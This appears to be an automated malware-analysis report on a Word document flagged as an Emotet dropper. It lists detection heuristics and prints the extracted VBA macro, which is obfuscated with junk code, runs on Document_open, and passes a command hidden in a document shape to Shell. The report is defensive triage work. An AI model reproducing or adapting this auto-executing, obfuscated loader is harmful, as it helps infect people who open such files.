MALICIOUS
272
Risk Score
Heuristics 9
-
ClamAV: Doc.Dropper.Emotet-6769504-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emotet-6769504-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End If RhathFcdI = Shell(oJzUaJWH + UYCrfF + hGvWIC, InbTzrZvPO) If (IEsbA <> 0 Or AMwmw) Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() If (cbQiPHvXB <> 0 Or BzHBAUQb) Then -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8193 bytes |
SHA-256: b865fcf2e133475aadcf694a490b81bd4b524cf7ffc257d73984aae0a7a9abc0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
100 of 160 identifiers look randomly generated (e.g. 'InbTzrZvPO'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rvVTvKPQD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wTlAbc()
Const InbTzrZvPO = 728742881 - 728742881
If (RodHR <> 0 Or uBhOd) Then
uBhOd = True
zlfwAN = zlfwAN & XMjzw = FTownY / SCEiZ
If (RodHR = 1) Then
zlfwAN = zlfwAN & MiDEi = 473639421 + 175731323
zlfwAN = zlfwAN & oMAIWi = JiDzhr - WMrFDu
zlfwAN = zlfwAN & LAuhzY = 385839616 + 138423160
Else
zlfwAN = zlfwAN & BUTIFz = YEKSU / 128857829
zlfwAN = zlfwAN & PiOFW = ulAqzB + 391022950
zlfwAN = zlfwAN & IdMGbY = 494921024 / 409192283
End If
End If
oJzUaJWH = Shapes(Njocr + Hjnikacl + 1 + FiGBd + UrjLw).TextFrame.ContainingRange + PZHUiQtz + sKKTAhBa
If (JizVa <> 0 Or XizUFzsZK) Then
XizUFzsZK = True
HKzZj = HKzZj & MFKiNC = DiAzR - 252482656
If (JizVa = 1) Then
HKzZj = HKzZj & YzRDv = 356302269 - 46849854
HKzZj = HKzZj & mrzIW = 54799935 / 317273180
HKzZj = HKzZj & iKKjmI = QZVsKv * VEwmEz
Else
HKzZj = HKzZj & KlHpHC = 74899805 / 125003398
HKzZj = HKzZj & wsPzo = 444553206 - 361862794
HKzZj = HKzZj & isPXvr = BpDFG - JsiuK
End If
End If
If (TaiGkN <> 0 Or IApmIztS) Then
IApmIztS = True
SHGZQG = SHGZQG & TITMn = 28844533 / 204734506
If (TaiGkN = 1) Then
SHGZQG = SHGZQG & JfliS = ovBkRi * 536135624
SHGZQG = SHGZQG & wiBkNQ = 170031492 / 363392021
SHGZQG = SHGZQG & pPtTr = NUKzQ + uorKB
Else
SHGZQG = SHGZQG & fSiPQW = 400296145 * rfHXSY
SHGZQG = SHGZQG & vndtl = 31072040 / 511902206
SHGZQG = SHGZQG & qSNTk = UPnzG - 44447257
End If
End If
RhathFcdI = Shell(oJzUaJWH + UYCrfF + hGvWIC, InbTzrZvPO)
If (IEsbA <> 0 Or AMwmw) Then
AMwmw = True
WouFUi = WouFUi & XJWiz = 155135603 - JJoCS
If (IEsbA = 1) Then
WouFUi = WouFUi & XMbNh = VEtsbw + dOjYJt
WouFUi = WouFUi & PJHzm = vXrwMJ * 393677311
WouFUi = WouFUi & SbAuaM = zZOiiY * UpZkfJ
Else
WouFUi = WouFUi & ENEbb = 61058196 * 92500192
WouFUi = WouFUi & fzMzj = RYBOp - wOGqvd
WouFUi = WouFUi & NmbiR = 249042790 + jAUNN
End If
End If
If (NGZzdl <> 0 Or fESvmaslJ) Then
fESvmaslJ = True
djIha = djIha & LGLiQG = 42289872 * 195465405
If (NGZzdl = 1) Then
djIha = djIha & cukUzl = OhYXm * 260920729
djIha = djIha & foQVb = qSGbSj * 499600419
djIha = djIha & ROtSGi = KqABF - 397244998
Else
djIha = djIha & AlmvIl = 211875038 + 371880889
djIha = djIha & UJXpqD = QcVTR / KUJUPR
djIha = djIha & NvpnOP = sEfLSh + SIqDbD
End If
End If
If (ZrNzZUiC <> 0 Or ztSOzEtP) Then
ztSOzEtP = True
OTMfQlM = OTMfQlM & IwJjzG = sVTqb * zpzIjM
If (ZrNzZUiC = 1) Then
OTMfQlM = OTMfQlM & EjBBH = 294260669 / 369736658
OTMfQlM = OTMfQlM & oJctbb = rMmswz - 99263839
OTMfQlM = OTMfQlM & DVclDn = OiNXjZ / dYvHcN
Else
OTMfQlM = OTMfQlM & GQcrO = 28233809 * AmDHKj
OTMfQlM = OTMfQlM & RjHQw = IZiPW - CsOoqk
OTMfQlM = OTMfQlM & mUzFz = owdcbF * DzatR
End If
End If
If (zEwBNQ <> 0 Or QHOSakmiu) Then
QHOSakmiu = True
OSaKN = OSaKN & EOulA = 274533609 / 366910973
If (zEwBNQ = 1) Then
OSaKN = OSaKN & zKnSW = sQFcij + FXJIh
OSaKN = OSaKN & wFOzv = 505321173 + 201187721
OSaKN = OSaKN & Iljum = fzwJD + HOoqiA
Else
OSaKN = OSaKN & ouJIzv = 370166047 - NMCMj
OSaKN = OSaKN & swNLJ = SKwjC * 229058209
OSaKN = OSaKN & TiASjH = 285332124 / 420172574
End If
End If
End Function
Private Sub Document_open()
If (cbQiPHvXB <> 0 Or BzHBAUQb) Then
BzHBAUQb = True
lwiujUwf = lwiujUwf & LDlUj = ENqlfR / sVzZhN
If (cbQiPHvXB = 1) Then
lwiujUwf = lwiujUwf & iQsov = tzhkK / ciMzB
lwiujUwf = lwiujUwf & Siwnii = PHGIuG - lSfuLw
lwiujUwf = lwiujUwf & fjGfG = 310630551 + 352081548
Else
lwiujUwf = lwiujUwf & OowjYw = 378223912 + OiQvmN
lwiujUwf = lwiujUwf & jtnpmd = 489280613 - 73745460
lwiujUwf = lwiujUwf & jKCRl = JmupH - DiaKa
End If
End If
If (IQdCooGr <> 0 Or okicsQjQN) Then
okicsQjQN = True
iwFfWitK = iwFfWitK & lXVHNj = tErHl * 491652053
If (IQdCooGr = 1) Then
iwFfWitK = iwFfWitK & NCTdpu = 269302997 - 308190071
iwFfWitK = iwFfWitK & FtMWnF = 228220741 - DkHUvi
iwFfWitK = iwFfWitK & GaTcQ = 163811242 + qWfYGA
Else
iwFfWitK = iwFfWitK & iCLssw = 71316237 * urKwUI
iwFfWitK = iwFfWitK & wJwXMG = HbAAYz * iNnQmI
iwFfWitK = iwFfWitK & AYPcw = LOQUII - 509706959
End If
End If
If (UhjRkjcR <> 0 Or rwjYTka) Then
rwjYTka = True
XfLzJAk = XfLzJAk & rMTRo = 19740201 - iEOUF
If (UhjRkjcR = 1) Then
XfLzJAk = XfLzJAk & zvMcNj = lFtoGc / jfzkK
XfLzJAk = XfLzJAk & zPsUJA = dScKwi - 473880653
XfLzJAk = XfLzJAk & dbSjjd = zwwXM - nhwGdJ
Else
XfLzJAk = XfLzJAk & fiCsT = pzSci * bjXFMO
XfLzJAk = XfLzJAk & hHASu = wLCwTV * pGQvYa
XfLzJAk = XfLzJAk & WnbjU = 361594041 / ilIQc
End If
End If
If (OYCBkIzEr <> 0 Or wRtcDiiu) Then
wRtcDiiu = True
mujcoa = mujcoa & NKKGjM = pPwdI - 406290212
If (OYCBkIzEr = 1) Then
mujcoa = mujcoa & JnzRA = XNvzAv - 259273085
mujcoa = mujcoa & LwCfw = 46061621 * awunu
mujcoa = mujcoa & CjNDNF = WbFwu - cqCaR
Else
mujcoa = mujcoa & JLTBF = 70121622 / 406321236
mujcoa = mujcoa & jCQhVO = 192947428 * FhzOK
mujcoa = mujcoa & iuvZo = AINUW - VdckZ
End If
End If
wTlAbc
If (YwnjtVrA <> 0 Or GSkdROo) Then
GSkdROo = True
fiiJXLQf = fiiJXLQf & lhkmJ = QuWNun - VYHQA
If (YwnjtVrA = 1) Then
fiiJXLQf = fiiJXLQf & BRjHR = 273633142 + piGiB
fiiJXLQf = fiiJXLQf & WEfjJP = 424688870 - 161138956
fiiJXLQf = fiiJXLQf & zhTiuA = ATJJBG + HdvFZ
Else
fiiJXLQf = fiiJXLQf & jUGKP = 287412525 - cYijl
fiiJXLQf = fiiJXLQf & shDbi = lHXCVU * duaObk
fiiJXLQf = fiiJXLQf & kwwcbJ = ZXWSm - 517831290
End If
End If
If (iBtuUa <> 0 Or LsTAqMd) Then
LsTAqMd = True
ihAqwkh = ihAqwkh & QHQtLf = 431864934 / 426251578
If (iBtuUa = 1) Then
ihAqwkh = ihAqwkh & QvwUil = sndZN / IvJzk
ihAqwkh = ihAqwkh & mbHLtd = HdmEh + fACFt
ihAqwkh = ihAqwkh & zlLpMN = 516527901 - WKmUw
Else
ihAqwkh = ihAqwkh & ISsQJ = 177917762 * 177063114
ihAqwkh = ihAqwkh & CrditF = 482072874 / vKhWGq
ihAqwkh = ihAqwkh & HlHbl = 48039716 / wVGqUI
End If
End If
If (JZHjvMTSv <> 0 Or wlNmaCJH) Then
wlNmaCJH = True
HivibzYQL = HivibzYQL & BjjwBT = TifXK / 4532830
If (JZHjvMTSv = 1) Then
HivibzYQL = HivibzYQL & BQdqv = 140861502 * 535769684
HivibzYQL = HivibzYQL & zVMKpQ = 340806579 + NqfjW
HivibzYQL = HivibzYQL & HjtzPo = SEjbb + 478879349
Else
HivibzYQL = HivibzYQL & wMtRz = 194081568 + 194071404
HivibzYQL = HivibzYQL & dkLNo = 513117164 - tjkGi
HivibzYQL = HivibzYQL & BJaDiI = 20031779 - 464005901
End If
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.